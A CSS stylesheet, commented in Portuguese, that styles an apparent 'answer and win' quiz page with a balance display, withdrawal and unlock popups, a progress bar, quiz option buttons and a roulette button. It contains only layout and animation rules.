@import url('https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,100;0,300;0,400;0,500;0,700;0,900;1,100;1,300;1,400;1,500;1,700;1,900&amp;display=swap');

* {
    margin: 0;
    padding: 0;
    box-sizing: border-box;
    font-family: 'Roboto', sans-serif;
}

header {
    width: 100%;
    height: 50px;
    display: flex;
    align-items: center;
    justify-content: space-between;
    padding: 10px;
    column-gap: 2em;
    position: fixed;
    z-index: 1;
    background-color: #ffffff;
}

/* Header otimizado */
.navbar {
    display: flex;
    justify-content: center;
    align-items: center;
    background-color: #ffffff;
    padding: 30px;
    box-shadow: 0 4px 20px rgba(0,47,135,0.15);
    position: relative;
}



.navbar img {
    height: 20vh;
    max-height: 200px;
    min-height: 120px;
    object-fit: contain;
    transition: all 0.4s ease;
    filter: drop-shadow(0 2px 8px rgba(0,47,135,0.2));
}

.navbar img:hover {
    transform: scale(1.08);
    filter: drop-shadow(0 4px 12px rgba(0,47,135,0.4));
}

.menu-icon, .logo-right, .logo-central {
    flex-grow: 0; /* Não permite que os itens cresçam */
    flex-shrink: 0; /* Não permite que os itens encolham */
}


header i {
    font-size: 18px;
}

header img {
    height: 30px;
}

#saldo {
    font-weight: 600;
    color: #ffffff;
    font-family: 'Montserrat', sans-serif;
    max-width: 100%;
    font-size: 20px;
    background: #002f87;
    border-radius: 12px;
    padding: 8px;
    margin-left: 20px;
    align-items: center;
    line-height: 30px;
    display: block;
    height: 45px;
    width: 130px;
    text-align: center;
    box-shadow: 0 2px 15px rgba(0, 47, 135, 0.5);
}

.valor-box {
    width: 130px;
    padding: 8px;
    align-items: center;
    display: block;
    margin: 0 auto;
  }

main {
    display: flex;
    flex-direction: column;
    align-items: center;
    justify-content: center;
    margin: 0 auto;
    padding: 50px 20px 10px 20px;
}

.main__saldo {
    width: 100%;
    display: flex;
    flex-direction: column;
    align-items: start;
    margin-bottom: 10px;
}

.main__saldo p {
    font-size: 24px;
    font-weight: 500;
}

.main__saldo p:last-child {
    color: #002f87;
}

.main__descricao {
    margin-bottom: 10px;
}

.main__descricao p {
    font-size: 16px;
    font-weight: 400;
    margin: 5px 0px;
}

.apresentacao {
    display: flex;
    flex-direction: column;
    align-items: center;
    justify-content: center;
    text-align: center;
}

.apresentacao h2 {
    font-size: 18px;
    font-weight: 600;
    letter-spacing: 0.5px;
    margin-bottom: 10px;
}

.apresentacao p {
    font-size: 16px;
    font-weight: 400;
    margin-bottom: 10px;
}

.apresentacao button {
    width: 100%;
    padding: 10px 20px;
    font-size: 18px;
    font-weight: 600;
    color: #ffffff;
    background-color: #002f87;
    border: none;
    border-radius: 5px;
}

.popup__container {
    width: 100%;
    height: 100vh;
    display: flex;
    align-items: center;
    justify-content: center;
    position: fixed;
    top: 0;
    left: 0;
    background-color: rgba(0, 47, 135, 0.8);
    padding: 10px;
    z-index: 1;
}

.popup {
    width: 100%;
    height: fit-content;
    display: flex;
    flex-direction: column;
    align-items: center;
    justify-content: center;
    background-color: #ffffff;
    padding: 20px;
    border-radius: 15px;
}

.popup__titulo {
    text-align: center;
}

.popup__titulo h2 {
    font-weight: 600;
    letter-spacing: 0.5px;
}

.popup__verificado {
    display: flex;
    flex-direction: column;
    align-items: center;
    justify-content: center;
    margin: 20px 0px;
}

.popup__verificado i {
    font-size: 120px;
    background-color: #002f87;
    padding: 20px 27.5px;
    border-radius: 50%;
    color: white;
}

.popup__verificado p {
    font-size: 24px;
    font-weight: 700;
    margin-top: 10px;
    color: #002f87;
    letter-spacing: 1px;
}

.popup__descricao {
    display: flex;
    flex-direction: column;
    justify-content: center;
    align-items: center;
}

.popup__descricao h2 {
    font-size: 18px;
    font-weight: 700;
    color: #002f87;
    letter-spacing: 0.5px;
}

.popup__descricao p {
    font-size: 18px;
    font-weight: 500;
}

.popup__botao {
    width: 100%;
    margin-top: 20px;
}

.popup__botao button {
    width: 100%;
    padding: 10px 20px;
    font-size: 18px;
    font-weight: 600;
    color: #ffffff;
    background-color: #002f87;
    border: none;
    border-radius: 5px;
}

.popup__vermelho {
    text-align: center;
}

.popup__vermelho i {
    font-size: 120px;
    background-color: #ff0000;
    padding: 20px 35px;
    border-radius: 50%;
    color: white;
    margin: 20px 0px;
}

.popup__descricao.baixar {
    text-align: center;
}

.popup__descricao.baixar p {
    font-weight: 500;
}

.popup__descricao.baixar p:first-child {
    margin-bottom: 10px;
}

.texto__azul {
    color: #002f87;
}

.texto__vermelho {
    color: #ff0000;
}

.card {
    width: 100%;
    height: fit-content;
    padding: 20px;
    border: 1px solid #d3d3d3;
    background-color: #f1f1f1;
    border-radius: 15px;
    margin-top: -30px;
}

.card__logo img {
    width: 90%;
    border-radius: 15px;
    display: flex;
    margin: 0 auto;
    margin-bottom: 20px;
}

.card__satisfacao {
    display: flex;
    flex-direction: column;
    align-items: center;
    justify-content: center;
}

.card__satisfacao h2,
.card__resposta h2 {
    text-align: center;
    font-size: 16px;
    font-weight: 400;
    letter-spacing: 0.5px;
}

.card__gradeContainer {
    display: grid;
    width: 100%;
    grid-template-rows: 1fr;
    grid-template-columns: 1fr 1fr 1fr 1fr 1fr;
    grid-gap: 10px;
    margin-top: 20px;
}

.card__grade {
    display: flex;
    align-items: center;
    justify-content: center;
    border-radius: 5px;
    transition: all ease 0.3s;
}

.card__grade i {
    font-size: 32px;
    color: #7e7e7e;
}

.card__gradeDescricao {
    width: 100%;
    display: flex;
    justify-content: space-between;
    font-size: 12px;
    margin: 5px 0px 20px 0px;
    color: #7e7e7e;
}

.resposta__gradeContainer {
    display: grid;
    grid-template-rows: 1fr;
    grid-template-columns: 1fr 1fr;
    grid-gap: 10px;
    margin: 10px 0px 20px 0px;
    text-align: center;
}

.resposta__gradeContainer3 {
    display: grid;
    grid-template-rows: 1fr;
    grid-template-columns: 1fr 1fr 1fr;
    grid-gap: 10px;
    margin: 10px 0px 20px 0px;
}

.resposta__grade {
    display: flex;
    align-items: center;
    justify-content: center;
    padding: 10px 15px;
    background-color: #d3d3d3;
    border-radius: 5px;
    transition: all ease 0.3s;
}

.resposta__grade.active {
    color: white;
    background-color: #002f87;
}



.resposta__grade p {
    font-size: 14px;
    font-weight: 500;
    letter-spacing: 0.5;
}

.card__enviarResposta {
    width: 100%;
    font-size: 16px;
    font-weight: 500;
    letter-spacing: 0.5px;
    padding: 10px 20px;
    background-color: #d3d3d3;
    border-radius: 5px;
    outline: none;
    border: none;
    transition: all ease 0.3s;
}

.card__enviarResposta.active {
    color: #ffffff;
    background-color: #002f87;
}

.main__videoContainer {
    width: 100%;
    height: calc(100vh - 50px);
}

.main__videoTitulo h2 {
    font-size: 16px;
    font-weight: 500;
    text-align: center;
    margin-bottom: 30px;
}

.main__botao {
    width: 100%;
    display: flex;
    align-items: center;
    justify-content: center;
}

.main__botao button {
    width: 100%;
    padding: 10px 20px;
    font-size: 18px;
    font-weight: 600;
    color: #ffffff;
    background-color: #002f87;
    border: none;
    border-radius: 5px;
    margin-top: 30px;
}

.finalizacao {
    background-color: #f1f1f1;;
}

.finalizacao__titulo {
    display: flex;
    color: #002f87;
    flex-direction: column;
    align-items: center;
    justify-content: center;
    margin-bottom: 10px;
}

.finalizacao__titulo2 {
    display: flex;
    color: #002f87;
    flex-direction: column;
    align-items: center;
    justify-content: center;
    margin-bottom: 10px;
    font-size: 18px;
    font-weight: bold;
    text-align: center;
}

.finalizacao__titulo h1,
.finalizacao__trofeu h2 {
    color: #002f87;
}

.finalizacao__trofeu {
    width: 100%;
    display: flex;
    flex-direction: column;
    align-items: center;
    justify-content: center;
    margin-bottom: 10px;
}

.finalizacao__trofeu img {
    width: 50%;
    margin-bottom: 10px;
}

.finalizacao__trofeu h2 {
    font-size: 48px;
}

.finalizacao__descricao p {
    font-size: 14px;
    font-weight: 400;
    margin-bottom: 5px;
}

.finalizacao__descricao p:last-child {
    margin-top: 5px;
}

.finalizacao__descricao span {
    font-size: 12px;
}

.finalizacao__botao button {
    width: 100%;
    padding: 10px 20px;
    font-size: 18px;
    font-weight: 600;
    color: #ffffff;
    background-color: #002f87;
    border: none;
    border-radius: 5px;
    margin-top: 10px;
    animation: pulse 2s infinite;
}

@keyframes pulse {
    0% {
        transform: scale(1);
    }
    50% {
        transform: scale(0.9);
    }
    100% {
        transform: scale(1);
    }
}

@media screen and (min-width: 769px) {
    main,
    .popup {
        max-width: 540px;
    }

}




  /* POPUP SAQUE */

  .popup-container {
    position: fixed;
    border-radius: 15px;
    top: 50%;
    left: 50%;
    width: 90%;   
    transform: translate(-50%, -50%);
    background-color: #fff;
    padding-bottom: 20px;
    padding-top: 20px;
    box-shadow: 0 0 100px rgba(0, 0, 0, 100);
    display: none;
    z-index: 10000;
 
  }

  .popup-container2 {
    display: none;
    margin: 0 auto;
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    background-color: #292929;
    display: flex;
    flex-direction: column;
    justify-content: center;
    z-index: 9997;
    opacity: 100%;
    color: white;
    box-shadow: 0 0 100px rgba(0, 0, 0, 100);
  }

  

  .popup-text {
    margin-top: 10px;
    font-size: 16px;
    color: #333;
    margin-bottom: 10px;
    display: block;
    text-align: center;
  }

  .popup-button {
    background-color: #002f87;
    width: 95%;
    border-radius: 8px;
    color: #fff;
    border: none;
    padding: 10px 20px;
    font-size: 14px;
    cursor: pointer;
    display: block;
    margin: 0 auto;
  }

  .desbloquear-button {
    background: linear-gradient(135deg, #002f87, #002f87);
    width: 90%;
    border-radius: 8px;
    color: #fff;
    border: none;
    height: 40px;
    font-size: 14px;
    cursor: pointer;
    display: block;
    margin: 0 auto;
    box-sizing: border-box;
    animation: pulse 2s infinite;
  }

  .menu {
    position: fixed;
    top: 0%;
    width: 100%;
    height: 70px; /* Ajuste a altura desejada */
    background: linear-gradient(180deg, #002f87, #002f87);
    display: flex;
    margin: 0 auto;
    justify-content: space-between;
    padding: 5px;
    box-sizing: border-box;
    z-index: 9998; /* Para garantir que o menu fique acima de outros elementos */
    box-shadow: 0 2px 15px rgba(0, 0, 0, 0.3);
}


  .menu::before {
    content: "";
    position: absolute;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    background: linear-gradient(180deg, #002f87, #002f87);
    z-index: -1;
    border-radius: 20px;
  }
  
  .menu a {
    flex: 1;
    display: flex;
    align-items: center;
    justify-content: center;
    text-decoration: none;
    color: #fff;
  }
  
  
  .menu a img {
    max-width: 100%; /* Ajuste o tamanho máximo da imagem */
    max-height: 100%; /* Ajuste o tamanho máximo da imagem */
    display: block;
  }

  .popup-container {
    position: fixed;
    border-radius: 15px;
    top: 50%;
    left: 50%;
    width: 90%;   
    transform: translate(-50%, -50%);
    background-color: #fff;
    padding-bottom: 20px;
    padding-top: 20px;
    box-shadow: 0 0 100px rgba(0, 0, 0, 100);
    display: none;
    z-index: 10000;
  }

  .texto-erro {
    text-align: center;
    color: #414141;
    font-size: 18px;
    margin-left: 10%;
    margin-right: 10%;
    font-family: 'Montserrat', sans-serif;
  }


  .slogan-inicio {
    display: flex;
    margin: 0 auto;
    justify-content: center; 
    align-items: center;
    background-color: #7a7a7a;
    box-shadow: 0px 0px 10px rgba(0, 0, 0, 0.3);
    height: 50px;
    width: 90%;
    border-radius: 12px;
    padding-top: 15px;
    padding-bottom: 15px;
    padding-left: 15px;
    padding-right: 15px;
}




.container {
    text-align: center;
    width: 90%;
    margin: 0 auto;
    display: block;
    padding-top: 10px;
    margin-top: -30px;
}

.progress-bar-container {
    display: flex;
    align-items: center;
    justify-content: space-between;
    width: 100%;
    margin-bottom: 10px;
}

.progress-bar {
    background-color: #e0e0e0;
    border-radius: 20px;
    width: 80%;
    height: 15px;
    position: relative;
}

.progress {
    background-color: #002f87;
    height: 100%;
    border-radius: 20px;
    width: 20%; /* Inicializado em 20% */
    transition: width 0.3s;
}

.progress-text {
    font-size: 20px;
    width: 20%; /* Ajusta a largura para alinhar corretamente */
    text-align: right;
    font-family: 'GellixSemiBold';
    color: #002f87;
}

.question-container {
}

.question {
    font-size: 0px;
}

.next-button {
    padding: 10px 20px;
    width: 90%;
    display: block;
    margin: 0 auto;
    font-size: 16px;
    background-color: #002f87;
    color: white;
    border: none;
    border-radius: 15px;
    cursor: pointer;
    font-weight: bold;
    font-size: 18px;
}

.next-button:disabled {
    background-color: #ccc;
    cursor: not-allowed;
}











/* Título da pesquisa otimizado */
.respondaeganhe {
    width: 96%;
    display: flex;
    margin: 0 auto;
    min-height: 90px;
    background: linear-gradient(135deg, #002f87 0%, #0056d6 50%, #002f87 100%);
    margin-bottom: 35px;
    border-radius: 20px;
    color: white;
    justify-content: center;
    align-items: center;
    flex-direction: column;
    padding: 25px 20px;
    box-shadow: 0 12px 35px rgba(0,47,135,0.4);
    position: relative;
    overflow: hidden;
    border: 2px solid rgba(255,255,255,0.1);
}

.respondaeganhe::before {
    content: '';
    position: absolute;
    top: 0;
    left: -100%;
    width: 100%;
    height: 100%;
    background: linear-gradient(90deg, transparent, rgba(255,255,255,0.15), transparent);
    transition: left 0.8s ease;
}

.respondaeganhe:hover::before {
    left: 100%;
}

.respondaeganhe h1 {
    font-family: 'GellixBold';
    font-size: 28px;
    margin: 0;
    line-height: 1.1;
    text-shadow: 0 3px 6px rgba(0,0,0,0.4);
    letter-spacing: 0.8px;
    text-align: center;
    position: relative;
    z-index: 2;
}

.respondaeganhe p {
    font-family: 'GellixMedium';
    font-size: 19px;
    margin: 10px 0 0 0;
    opacity: 0.95;
    font-weight: 500;
    letter-spacing: 0.4px;
    text-align: center;
    position: relative;
    z-index: 2;
    text-shadow: 0 1px 3px rgba(0,0,0,0.3);
}

/* Responsividade otimizada */
@media screen and (min-width: 1200px) {
    .navbar {
        padding: 35px;
    }
    
    .navbar img {
        height: 22vh;
        max-height: 220px;
    }
    
    .respondaeganhe {
        width: 80%;
        max-width: 800px;
        min-height: 100px;
        padding: 30px 25px;
    }
    
    .respondaeganhe h1 {
        font-size: 32px;
        letter-spacing: 1px;
    }
    
    .respondaeganhe p {
        font-size: 21px;
        letter-spacing: 0.5px;
    }
}

@media screen and (min-width: 769px) and (max-width: 1199px) {
    .navbar {
        padding: 28px;
    }
    
    .navbar img {
        height: 16vh;
        max-height: 160px;
    }
    
    .respondaeganhe {
        width: 90%;
        max-width: 700px;
        min-height: 95px;
        padding: 28px 22px;
    }
    
    .respondaeganhe h1 {
        font-size: 30px;
        letter-spacing: 0.9px;
    }
    
    .respondaeganhe p {
        font-size: 20px;
        letter-spacing: 0.45px;
    }
}

@media screen and (max-width: 768px) {
    .navbar {
        padding: 20px;
    }
    
    .navbar img {
        height: 12vh;
        max-height: 100px;
    }
    
    .respondaeganhe {
        width: 94%;
        min-height: 80px;
        padding: 20px 15px;
        margin-bottom: 30px;
    }
    
    .respondaeganhe h1 {
        font-size: 24px;
        letter-spacing: 0.6px;
    }
    
    .respondaeganhe p {
        font-size: 17px;
        letter-spacing: 0.3px;
    }
    
    .next-button {
        width: 90%;
        padding: 12px 20px;
        font-size: 16px;
        border-radius: 15px;
        margin: 0 auto;
        left: 50%;
    }
    
    .next-button.roulette-button {
        bottom: 20px;
        width: 92%;
        max-width: 350px;
        padding: 15px 25px;
        font-size: 18px;
        border-radius: 20px;
    }
}

@media screen and (max-width: 480px) {
    .navbar {
        padding: 15px;
    }
    
    .navbar img {
        height: 10vh;
        max-height: 80px;
    }
    
    .respondaeganhe {
        width: 92%;
        min-height: 70px;
        padding: 18px 12px;
    }
    
    .respondaeganhe p {
        font-size: 16px;
    }
    
    .next-button {
        width: 92%;
        padding: 10px 18px;
        font-size: 15px;
        border-radius: 12px;
        margin: 0 auto;
        left: 50%;
    }
    
    .next-button.roulette-button {
        bottom: 15px;
        width: 94%;
        max-width: 300px;
        padding: 12px 20px;
        font-size: 16px;
        border-radius: 18px;
    }
}



.radio-container {
    display: flex;
    flex-direction: column;
    padding-left: 20px;
    padding-bottom: 20px;
    padding-top: 0px;
}
.radio-container label {
    font-size: 18px;
    font-family: 'GellixRegular';
}

.pergunta-botao {
    width: 90%;
    background-color: #002f87;
    display: block;
    margin: 0 auto;
    border: none;
    height: 40px;
    border-radius: 5px;
    color: white;
    font-size: 16px;
}

/* Estilos específicos para o quiz da Tramontina */
.quiz-options button:focus {
    outline: 2px solid #002f87;
    outline-offset: 2px;
}

.quiz-options button:active {
    transform: scale(0.98);
}



/* Melhorias na barra de progresso */
.progress-bar-container {
    background: #f0f0f0;
    border-radius: 20px;
    height: 12px;
    overflow: hidden;
    box-shadow: inset 0 1px 3px rgba(0,0,0,0.1);
}

.progress {
    background: linear-gradient(90deg, #002f87, #0056d6);
    box-shadow: 0 1px 3px rgba(0,47,135,0.3);
}

/* Estilo para o botão de próximo
.next-button {
    background: linear-gradient(135deg, #002f87, #0056d6);
    box-shadow: 0 4px 15px rgba(0,47,135,0.3);
    transition: all 0.3s ease;
    display: block;
    margin: 0 auto;
    text-align: center;
    left: 50%;
}

.next-button:hover {
    transform: translateY(-2px);
    box-shadow: 0 6px 20px rgba(0,47,135,0.4);
}

.next-button:active {
    transform: translateY(0);
}
*/

/* Melhorias na responsividade para desktop */
@media screen and (min-width: 1200px) {
    .pergunta {
        width: 85%;
        max-width: 900px;
        margin: 0 auto;
    }
    
    .pergunta_title {
        font-size: 24px;
        margin: 20px 8% 15px 8%;
        padding-top: 20px;
    }
    
    .quiz-options {
        margin: 20px 8%;
        gap: 15px;
    }
    
    .quiz-options button {
        font-size: 18px;
        padding: 15px;
        border-radius: 30px;
    }
    /*
    .next-button {
        width: 85%;
        max-width: 400px;
        padding: 15px 25px;
        font-size: 20px;
        border-radius: 20px;
        margin: 0 auto;
    }
    
    .next-button.roulette-button {
        bottom: 35px;
        width: 85%;
        max-width: 450px;
        padding: 20px 35px;
        font-size: 22px;
        border-radius: 25px;
    }
    */
    .container {
        width: 85%;
        max-width: 900px;
    }
    
    .progress-bar-container {
        height: 15px;
        border-radius: 25px;
    }
    
    .progress {
        height: 15px;
        border-radius: 25px;
    }
    
    .progress-text {
        font-size: 22px;
    }
}

@media screen and (min-width: 769px) and (max-width: 1199px) {
    .pergunta {
        width: 88%;
        max-width: 750px;
    }
    
    .pergunta_title {
        font-size: 22px;
        margin: 18px 6% 15px 6%;
        padding-top: 18px;
    }
    
    .quiz-options {
        margin: 18px 6%;
        gap: 12px;
    }
    
    .quiz-options button {
        font-size: 17px;
        padding: 12px;
        border-radius: 28px;
    }
    /*
    .next-button {
        width: 88%;
        max-width: 350px;
        padding: 12px 22px;
        font-size: 19px;
        border-radius: 18px;
        margin: 0 auto;
    }
    */
    .next-button.roulette-button {
        bottom: 25px;
        width: 90%;
        max-width: 400px;
        padding: 16px 28px;
        font-size: 19px;
        border-radius: 22px;
    }
    
    .container {
        width: 88%;
        max-width: 750px;
    }
    
    .progress-bar-container {
        height: 14px;
        border-radius: 22px;
    }
    
    .progress {
        height: 14px;
        border-radius: 22px;
    }
    
    .progress-text {
        font-size: 21px;
    }
}

/* Melhorias gerais para o quiz */
.pergunta {
    display: block;
    margin: 0 auto;
    background-color: rgb(237, 237, 237);
    width: 93%;
    border-radius: 15px;
    margin-top: 0px;
    box-shadow: 0 4px 20px rgba(0,0,0,0.1);
}

/* Centralização melhorada para o botão */
.next-button {
    display: block;
    margin: 0 auto;
    text-align: center;
    left: 50%;
}

/* Botão fixo para acessar roleta */
.next-button.roulette-button {
    bottom: 30px;
    left: 50%;
    z-index: 1000;
    width: 90%;
    max-width: 400px;
    background: linear-gradient(135deg, #002f87, #0056d6);
    color: white;
    border: none;
    border-radius: 25px;
    padding: 18px 30px;
    font-size: 20px;
    font-weight: bold;
    cursor: pointer;
    box-shadow: 0 8px 25px rgba(0,47,135,0.4);
    text-transform: uppercase;
    letter-spacing: 1px;
}

.next-button.roulette-button:hover {
    box-shadow: 0 12px 35px rgba(0,47,135,0.6);
    background: linear-gradient(135deg, #0056d6, #002f87);
}

.next-button.roulette-button:active {

}

.pergunta_title {
    margin-left: 5%;
    margin-right: 5%;
    padding-top: 15px;
    text-align: center;
    font-size: 20px;
    padding-bottom: 10px;
    font-family: 'GellixSemiBold';
    color: #002f87;
    line-height: 1.3;
}

.quiz-options {
    list-style: none;
    padding: 0;
    display: flex;
    flex-wrap: wrap;
    margin-left: 5%;
    margin-right: 5%;
    justify-content: space-between;
    gap: 10px;
}

.quiz-options li {
    flex: 1 1 calc(50% - 10px);
    display: flex;
    justify-content: center;
}

/* Indicador de som */
.sound-indicator {
    text-align: center;
    margin-bottom: 15px;
    font-size: 12px;
    color: #666;
    font-family: 'GellixRegular';
    padding: 8px;
    background: rgba(0,47,135,0.05);
    border-radius: 20px;
    border: 1px solid rgba(0,47,135,0.1);
    transition: all 0.3s ease;
}

.sound-indicator:hover {
    background: rgba(0,47,135,0.1);
    border-color: rgba(0,47,135,0.2);
}

/* Melhorias nos botões de opção */
.quiz-options button {
    width: 100%;
    padding: 10px;
    font-size: 16px;
    border: 2px solid #ccc;
    border-radius: 25px;
    background-color: #fff;
    color: #555;
    cursor: pointer;
    transition: all 0.3s ease;
    font-family: 'GellixMedium';
    min-height: 50px;
    overflow: hidden;
}

.quiz-options button::before {
    content: '';
    position: absolute;
    top: 0;
    left: -100%;
    width: 100%;
    height: 100%;
    background: linear-gradient(90deg, transparent, rgba(0,47,135,0.1), transparent);
    transition: left 0.5s ease;
}

.quiz-options button:hover::before {
    left: 100%;
}

.quiz-options button:hover {
    border-color: #002f87;
    color: #002f87;
    transform: translateY(-2px);
    box-shadow: 0 4px 15px rgba(0,47,135,0.2);
}

.quiz-options button:focus {
    outline: 2px solid #002f87;
    outline-offset: 2px;
}

.quiz-options button:active {
    transform: scale(0.98);
}

/* Efeito de seleção com animação */
.quiz-options button.selected {
    border-color: #002f87;
    background-color: #e6f0ff;
    color: #002f87;
    animation: selectionPulse 0.3s ease;
}

@keyframes selectionPulse {
    0% {
        transform: scale(1);
    }
    50% {
        transform: scale(1.05);
    }
    100% {
        transform: scale(1);
    }
}